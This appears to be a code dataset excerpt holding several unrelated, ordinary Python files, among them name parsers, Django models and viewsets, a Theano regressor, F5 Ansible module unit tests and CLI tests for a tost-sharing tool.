index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
17,000 | 3dc43940957aa79137a2404c34b250e4af9d4ee6 | #base Namer class
# Base class holding the two name components shared by all namer subclasses.
class Namer():
    def __init__(self):
        # Both parts start empty; a subclass fills them in during parsing.
        self.first = ""
        self.last = ""
#derived namer class for First <space> Last
# Namer subclass that parses "First Last" formatted strings.
class FirstFirst(Namer):
    def __init__(self, namestring):
        super().__init__()
        # A space at position > 0 means there is a usable first-name part.
        # NOTE(review): a trailing-space-only input like "John " passes the
        # check but split() yields one element, raising IndexError -- this
        # matches the original behavior; confirm whether it needs guarding.
        if namestring.find(" ") > 0:
            parts = namestring.split()
            self.first = parts[0]
            self.last = parts[1]
        else:
            # No separator: treat the whole string as the last name.
            self.last = namestring
#derived Namer class for Last <comma> First
# Namer subclass that parses "Last, First" formatted strings.
class LastFirst(Namer):
    def __init__(self, namestring):
        super().__init__()
        # A comma at position > 0 means there is a last-name part before it.
        if namestring.find(",") > 0:
            # Bug fix: the original kept the space after the comma, so
            # "Doe, John" produced first == " John"; it also silently
            # dropped anything after a second comma. Split once and strip.
            last, first = namestring.split(",", 1)
            self.last = last.strip()
            self.first = first.strip()
        else:
            # No separator: treat the whole string as the last name.
            self.last = namestring
"""The NamerFactory returns an instance of a Namer subclass that separates first and last names,
choosing the parser depending on whether a comma is present in the input string"""
class NamerFactory():
    """Factory selecting the Namer subclass that matches the input format.

    A comma in the string signals "Last, First"; otherwise the string is
    treated as "First Last".
    """

    def __init__(self, namestring):
        self.name = namestring

    def getNamer(self):
        # A comma at position > 0 means a last-name part precedes it.
        if self.name.find(",") > 0:
            return LastFirst(self.name)
        return FirstFirst(self.name)
class Builder:
    def compute(self):
        """Prompt for names until the user types 'quit', printing each parse.

        Bug fix: the original checked the sentinel only at the top of the
        loop, so the literal string 'quit' was itself run through the
        factory and printed before the loop exited.
        """
        while True:
            name = input("Enter name: ")  # get the name string
            if name == 'quit':
                break
            # Get the Namer Factory and then the namer class
            namerFact = NamerFactory(name)
            namer = namerFact.getNamer()
            print(namer.first, namer.last)
def main():
    """Program entry point: run the interactive name-parsing loop."""
    Builder().compute()
### Here we go ####
if __name__ == "__main__":
main() |
17,001 | 2fa8dfcb6ffec8003bda378ae12f2d0aaaf64cf8 | """
Dataset loading
"""
import numpy
from app import app
def load_captions(captions_dataset_path):
    """Read one caption per line from *captions_dataset_path*.

    The file is opened in binary mode, so each caption is a stripped
    ``bytes`` object, returned in file order.
    """
    app.logger.info('Loading Captions from {}'.format(captions_dataset_path))
    # Build the list directly inside the context manager; the original
    # pre-initialised an empty list that was immediately overwritten.
    with open(captions_dataset_path, 'rb') as f:
        captions = [line.strip() for line in f]
    app.logger.info('Finished loading Captions from {}'.format(captions_dataset_path))
    return captions
def load_image_features(image_features_path):
    """Load precomputed image features from disk via ``numpy.load``.

    Returns whatever ``numpy.load`` yields for the file (typically an
    ``ndarray``, or an ``NpzFile`` for .npz archives).
    """
    # Typo fix: the log messages previously read "feautres".
    app.logger.info('Loading image features from {}'.format(image_features_path))
    image_features = numpy.load(image_features_path)
    app.logger.info('Finished loading image features from {}'.format(image_features_path))
    return image_features
17,002 | 207e87b6c0c18bdcfd9ad34b0cf84d5d0b6c7ed6 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated,IsAdminUser
from .models import *
from .serializers import *
# Create your views here.
class ProductoLista(viewsets.ModelViewSet):
    """CRUD endpoints for Producto, restricted to admin users."""
    serializer_class = CatalogoProductoSerializer
    permission_classes = (IsAdminUser,)

    def get_queryset(self):
        # Evaluated per request (unlike a class-level queryset attribute).
        return Producto.objects.all()
class InsumoLista(viewsets.ModelViewSet):
    """CRUD endpoints for Insumo, restricted to admin users."""
    serializer_class = InsumoSerializer
    permission_classes = (IsAdminUser,)

    def get_queryset(self):
        # Evaluated per request (unlike a class-level queryset attribute).
        return Insumo.objects.all()
class TipoInsumoLista(viewsets.ModelViewSet):
    """CRUD endpoints for TipoInsumo.

    NOTE(review): unlike the sibling viewsets, no permission_classes is set
    here, so the DRF defaults apply -- confirm this endpoint is meant to be
    less restricted than ProductoLista/InsumoLista.
    """
    serializer_class = TipoInsumoSerializer
    queryset = TipoInsumo.objects.all()
17,003 | dab06b6c9bcd509c44852853ba9684357be486b3 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-04-27 04:05
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration altering Test.testDate's default.
    dependencies = [
        ('HealthNet', '0006_auto_20170426_2052'),
    ]
    operations = [
        migrations.AlterField(
            model_name='test',
            name='testDate',
            # NOTE(review): the default is the fixed, timezone-naive moment
            # this migration was generated (makemigrations captured a
            # datetime.now() result), not a per-row "now". Typical of
            # auto-generated migrations; the model likely wanted a callable.
            field=models.DateTimeField(default=datetime.datetime(2017, 4, 27, 4, 5, 48, 599245)),
        ),
    ]
|
17,004 | 0e9d961b92f32eb014d26629ddf39cb4f9de864f | from __future__ import print_function, division
from builtins import range
import numpy as np
import theano
import theano.tensor as T
import q_learning
# deep neural networks are easier to write with frameworks like theano and tensorflow
# because you don't have to derive any of the gradients yourself
# first we looked at Q learning without any function approximation
# then we looked at Q Learning with linear function approximation
# and gradient descent using scikit learning
# then we looked at the same method but without using Q Learning and
# writing the model from scratch with numpy
# now we're going to recreate the same thing in Theano
# this is designed to remind you of all the important parts of a Theano neural network
# (1) Creating graph inputs
# (2) defining shared variables which are parameters that can be updated
# (3) creating the cost function
# (4) defining the updates
# (5) compiling functions to do training and prediction
# all we need to do is build an SGDRegressor to overwrite the one from the other Q Learning script
# most of the work is in the constructor
class SGDRegressor:
    """Linear regression trained by stochastic gradient descent in Theano.

    Drop-in replacement for the regressor used by the q_learning script:
    exposes partial_fit(X, Y) and predict(X).
    """

    def __init__(self, D):
        print("Hello Theano!")
        # Initialise w ~ N(0, 1/D) and wrap it in a shared variable so the
        # compiled Theano function can update it in place.
        w = np.random.randn(D) / np.sqrt(D)
        self.w = theano.shared(w)
        self.lr = 10e-2  # learning rate (0.1)

        # Graph inputs: X is 2-D (samples x features), Y is a 1-D target vector.
        X = T.matrix('X')
        Y = T.vector('Y')
        Y_hat = X.dot(self.w)
        delta = Y - Y_hat
        # Squared error is the cost.
        cost = delta.dot(delta)
        grad = T.grad(cost, self.w)
        # Bug fix: gradient DESCENT steps against the gradient,
        # w <- w - lr * grad. The original wrote w * lr * grad, which is an
        # elementwise product, not an update step, and would collapse the
        # weights instead of training them.
        updates = [(self.w, self.w - self.lr * grad)]

        self.train_op = theano.function(
            inputs=[X, Y],
            updates=updates,
        )
        self.predict_op = theano.function(
            inputs=[X],
            outputs=Y_hat,
        )

    def partial_fit(self, X, Y):
        """Run one SGD update on the batch (X, Y)."""
        self.train_op(X, Y)

    def predict(self, X):
        """Return X.dot(w) under the current weights."""
        return self.predict_op(X)
# all we do is replace Q Learning as the SGDRegressor with the one we just made
if __name__ == '__main__':
q_learning.SGDRegressor = SGDRegressor
q_learning.main() |
17,005 | 908ed27edf0441fd2f3361f42ac70ed5790d999e | # Enumerate a python list and try to print the counter with the list value
# Demonstrate enumerate() on a list: materialising the iterator shows the
# (index, value) pairs, while printing the raw enumerate object only shows
# its repr.
list1 = ['ananya', 'pooja', 'harshitha', 'anu', 'nithin']
print(list(enumerate(list1)))
print(enumerate(list1))

# The same counter/value pairing works for tuples.
tuple1 = ('anusha', 'shravya', 'priya', 'karthik', 'satish')
print(tuple(enumerate(tuple1)))
17,006 | 349370446a9006b5ecd64a3a0b6d5526a8c8233a | # -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage import (
V1ModuleParameters, V1Manager, ModuleManager, ArgumentSpec
)
from ansible_collections.f5networks.f5_modules.plugins.module_utils.common import F5ModuleError
from ansible_collections.f5networks.f5_modules.tests.unit.modules.utils import set_module_args
from ansible_collections.f5networks.f5_modules.tests.unit.compat import unittest
from ansible_collections.f5networks.f5_modules.tests.unit.compat.mock import (
Mock, patch
)
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
    """Load a fixture file by name, memoising results in fixture_data.

    The raw text is parsed as JSON when possible; otherwise the plain
    string content is cached and returned as-is.
    """
    path = os.path.join(fixture_path, name)
    if path not in fixture_data:
        with open(path) as f:
            raw = f.read()
        try:
            parsed = json.loads(raw)
        except Exception:
            parsed = raw
        fixture_data[path] = parsed
    return fixture_data[path]
class TestParameters(unittest.TestCase):
    # Unit tests for V1ModuleParameters' normalisation of raw module args.
    def test_module_parameters_template(self):
        # The human-readable template name must map to the internal
        # POLICY_TEMPLATE_* identifier expected by the BIG-IP API.
        args = dict(
            name='fake_policy',
            state='present',
            template='LotusDomino 6.5 (http)'
        )
        p = V1ModuleParameters(params=args)
        assert p.name == 'fake_policy'
        assert p.state == 'present'
        assert p.template == 'POLICY_TEMPLATE_LOTUSDOMINO_6_5_HTTP'
class TestManager(unittest.TestCase):
    def setUp(self):
        # Shared fixtures: the module's argument spec and a fake policy file.
        self.spec = ArgumentSpec()
        self.policy = os.path.join(fixture_path, 'fake_policy.xml')
        # Silence real sleeps inside the module's wait/retry loops.
        self.patcher1 = patch('time.sleep')
        self.patcher1.start()
        # Pretend the ASM module is provisioned on the target device.
        self.p1 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage.module_provisioned')
        self.m1 = self.p1.start()
        self.m1.return_value = True
        # Report a fixed TMOS version and make telemetry (teem) a no-op.
        self.p2 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage.tmos_version')
        self.p3 = patch('ansible_collections.f5networks.f5_modules.plugins.modules.bigip_asm_policy_manage.send_teem')
        self.m2 = self.p2.start()
        self.m2.return_value = '14.1.0'
        self.m3 = self.p3.start()
        self.m3.return_value = True
    def tearDown(self):
        # Undo every patch started in setUp so state never leaks between tests.
        self.patcher1.stop()
        self.p1.stop()
        self.p2.stop()
        self.p3.stop()
def test_activate_create_from_template(self, *args):
set_module_args(dict(
name='fake_policy',
template='OWA Exchange 2007 (https)',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.import_to_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
v1.create_from_template_on_device = Mock(return_value=True)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
assert results['template'] == 'OWA Exchange 2007 (https)'
assert results['active'] == 'yes'
def test_activate_create_by_name(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.import_to_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.create_on_device = Mock(return_value=True)
v1.create_blank = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
assert results['active'] == 'yes'
def test_activate_policy_exists_inactive(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.update_on_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['active'] == 'yes'
def test_activate_policy_exists_active(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_active.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is False
def test_deactivate_policy_exists_active(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='no',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_active.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.update_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
def test_deactivate_policy_exists_inactive(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='no',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is False
def test_create_from_template(self, *args):
set_module_args(dict(
name='fake_policy',
template='LotusDomino 6.5 (http)',
state='present',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.create_from_template_on_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.read_current_from_device = Mock(return_value=current)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
assert results['template'] == 'LotusDomino 6.5 (http)'
def test_create_by_name(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.import_to_device = Mock(return_value=True)
v1.wait_for_task = Mock(side_effect=[True, True])
v1.create_on_device = Mock(return_value=True)
v1.create_blank = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
assert results['name'] == 'fake_policy'
def test_delete_policy(self, *args):
set_module_args(dict(
name='fake_policy',
state='absent',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(side_effect=[True, False])
v1.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
results = mm.exec_module()
assert results['changed'] is True
def test_activate_policy_raises(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
active='yes',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
current = V1ModuleParameters(params=load_fixture('load_asm_policy_inactive.json'))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
msg = 'Apply policy task failed.'
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=True)
v1.wait_for_task = Mock(return_value=False)
v1.update_on_device = Mock(return_value=True)
v1.read_current_from_device = Mock(return_value=current)
v1.apply_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
with pytest.raises(F5ModuleError) as err:
mm.exec_module()
assert str(err.value) == msg
def test_create_policy_raises(self, *args):
set_module_args(dict(
name='fake_policy',
state='present',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
msg = 'Failed to create ASM policy: fake_policy'
# Override methods to force specific logic in the module to happen
v1 = V1Manager(module=module)
v1.exists = Mock(return_value=False)
v1.create_on_device = Mock(return_value=False)
v1._file_is_missing = Mock(return_value=False)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_13 = Mock(return_value=False)
mm.get_manager = Mock(return_value=v1)
with pytest.raises(F5ModuleError) as err:
mm.exec_module()
assert str(err.value) == msg
    def test_delete_policy_raises(self, *args):
        # Deletion failure path: exists() returning True both before AND
        # after remove_from_device simulates a policy that survived the
        # delete, which the module must surface as an F5ModuleError.
        set_module_args(dict(
            name='fake_policy',
            state='absent',
            provider=dict(
                server='localhost',
                password='password',
                user='admin'
            )
        ))
        module = AnsibleModule(
            argument_spec=self.spec.argument_spec,
            supports_check_mode=self.spec.supports_check_mode
        )
        msg = 'Failed to delete ASM policy: fake_policy'
        # Override methods to force specific logic in the module to happen
        v1 = V1Manager(module=module)
        v1.exists = Mock(side_effect=[True, True])
        v1.remove_from_device = Mock(return_value=True)
        # Override methods to force specific logic in the module to happen
        mm = ModuleManager(module=module)
        mm.version_is_less_than_13 = Mock(return_value=False)
        mm.get_manager = Mock(return_value=v1)
        with pytest.raises(F5ModuleError) as err:
            mm.exec_module()
        assert str(err.value) == msg
|
17,007 | a8ff887345054f2c9b48a17470296b995299221a | isbn12 = input("enter isbn:")
# Compute the ISBN-13 check digit from the 12 digits read above.
# Digits at even positions (0, 2, ..., 10) are weighted 1 and digits at odd
# positions weighted 3; the check digit brings the weighted sum to a
# multiple of 10. (Reconstructed: the original last line, "tem[ = int()]",
# was a syntax error -- this completes the evident intent.)
sum1 = 0
sum2 = 0
for index in range(0, 12, 2):
    sum1 += int(isbn12[index])
for index in range(1, 12, 2):
    sum2 += int(isbn12[index])
check_digit = (10 - (sum1 + 3 * sum2) % 10) % 10
print("check digit:", check_digit)
17,008 | acb33dc09c8ba893a47fca2d23cb2339d87e13ef | import commands
import requests
import sys
import unittest
class TestCase(unittest.TestCase):
    def setUp(self):
        # Four distinct test identities; auth tokens start empty and are
        # filled in by sign_up() as individual tests need them.
        self.email_0 = "alice@example.com"
        self.email_1 = "bob@example.com"
        self.email_2 = "carol@example.com"
        self.email_3 = "david@example.com"
        self.auth_token_0 = ""
        self.auth_token_1 = ""
        self.auth_token_2 = ""
        self.auth_token_3 = ""
    def sign_up(self, email):
        """Sign up *email* via the job.sh CLI, log in as them, and return the token.

        The token is assumed to be the last whitespace-separated word of the
        signup output -- TODO confirm against job.sh's message format. Exit
        codes are deliberately ignored here; individual tests assert them.
        """
        cmd = "./job.sh signup " + email
        exit_code, msg = commands.getstatusoutput(cmd)
        auth_token = msg.split(" ")[-1]
        cmd = "./job.sh login " + auth_token
        exit_code, msg = commands.getstatusoutput(cmd)
        return auth_token
def test_signup(self):
cmd = "./job.sh signup " + self.email_0
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful signup for alice@example.com with id", msg)
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("already signed up with that email", msg)
def test_login(self):
cmd = "./job.sh signup " + self.email_0
exit_code, msg = commands.getstatusoutput(cmd)
self.auth_token_0 = msg.split(" ")[-1]
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful login for alice@example.com with id", msg)
cmd = "./job.sh login " + "abcd0123"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("invalid token", msg)
def test_index(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh list"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
self.assertIn("successful list request", msg)
def test_create(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful create for tost with access token", msg)
cmd = "./job.sh create " + ""
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("too few command line arguments!", msg)
def test_view(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
# case 3: user is creator of tost that propagation points to
cmd = "./job.sh view " + msg.split(" ")[-1]
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 2: user visits resource for the first time
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_1 = msg.split(": ")[0]
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 4: user propagation is of lower priority than propagation in url
self.auth_token_2 = self.sign_up(self.email_2)
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_2 = msg.split(": ")[0]
cmd = "./job.sh view " + ppgn_token_2
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 5: user propagation is of higher priority than propagation in url
self.auth_token_3 = self.sign_up(self.email_3)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_3 = msg.split(": ")[0]
cmd = "./job.sh view " + ppgn_token_3
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("foo", msg)
# case 1: propagation invalid
cmd = "./job.sh login " + self.auth_token_1
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh view " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("tost not found", msg)
def test_edit(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
cmd = "./job.sh edit " + ppgn_token_0 + " " + "bar"
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful edit for tost with access token", msg)
def test_access(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh access " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn(self.email_1, msg)
self.assertIn("successful access request", msg)
def test_upgrade(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_1 = msg.split(": ")[0]
self.auth_token_2 = self.sign_up(self.email_2)
cmd = "./job.sh view " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_2 = msg.split(": ")[0]
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh upgrade " + ppgn_token_0 + " " + ppgn_token_2
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful upgrade for tost with access token", msg)
cmd = "./job.sh login " + self.auth_token_1
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh upgrade " + ppgn_token_1 + " " + ppgn_token_2
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("destination not ancestor", msg)
def test_disable(self):
self.auth_token_0 = self.sign_up(self.email_0)
cmd = "./job.sh create " + "foo"
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_0 = msg.split(" ")[-1]
self.auth_token_1 = self.sign_up(self.email_1)
cmd = "./job.sh view " + ppgn_token_0
exit_code, msg = commands.getstatusoutput(cmd)
ppgn_token_1 = msg.split(": ")[0]
cmd = "./job.sh login " + self.auth_token_0
exit_code, msg = commands.getstatusoutput(cmd)
cmd = "./job.sh disable " + ppgn_token_0 + " " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code, 0)
self.assertIn("successful disable for tost with access token", msg)
cmd = "./job.sh disable " + ppgn_token_0 + " " + ppgn_token_1
exit_code, msg = commands.getstatusoutput(cmd)
self.assertEqual(exit_code >> 8, 1)
self.assertIn("target not descendant of", msg)
    def tearDown(self):
        # Reset server-side state between tests (best effort; response ignored).
        requests.get("http://127.0.0.1:5000/reset")
|
17,009 | cccaca0ecb1dc6331423425849c9b8767d065dd7 | from django.contrib.auth import get_user_model
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from django.utils.timezone import now
from unidecode import unidecode
from phonenumber_field.modelfields import PhoneNumberField
User = get_user_model()
class Tour(models.Model):
    # A bookable tour offer; `active` toggles public visibility.
    title = models.CharField(max_length=250, unique=True)
    destination = models.TextField()
    description = models.TextField()
    price = models.PositiveIntegerField()
    duration = models.DurationField(blank=True)
    slug = models.SlugField(allow_unicode=True, unique=True)
    active = models.BooleanField(default=True)

    def get_absolute_url(self):
        # NOTE(review): 'html name' looks like a placeholder URL pattern
        # name -- confirm it matches an actual entry in urls.py.
        return reverse('html name', kwargs={'slug': self.slug})

    def save(self, *args, **kwargs):
        # Regenerate the slug from the transliterated title on every save.
        self.slug = slugify(unidecode(self.title))
        super().save(*args, **kwargs)

    def change_status(self):
        # Flip visibility. super().save() bypasses the slug-regenerating
        # override above -- presumably deliberate; TODO confirm.
        self.active = not self.active
        super().save()

    def __str__(self):
        return self.title
class Comment(models.Model):
    # A user comment attached to a tour.
    user = models.ForeignKey(User, name='user', related_name='+', on_delete=models.CASCADE)
    tour = models.ForeignKey(Tour, name='tour', related_name='comments', on_delete=models.CASCADE)
    text = models.TextField(max_length=4000)
    created_at = models.DateTimeField(default=now)
    # NOTE(review): default=now only stamps creation; nothing here updates
    # this field on edit -- auto_now=True may have been intended. Confirm.
    modified_at = models.DateTimeField(default=now)

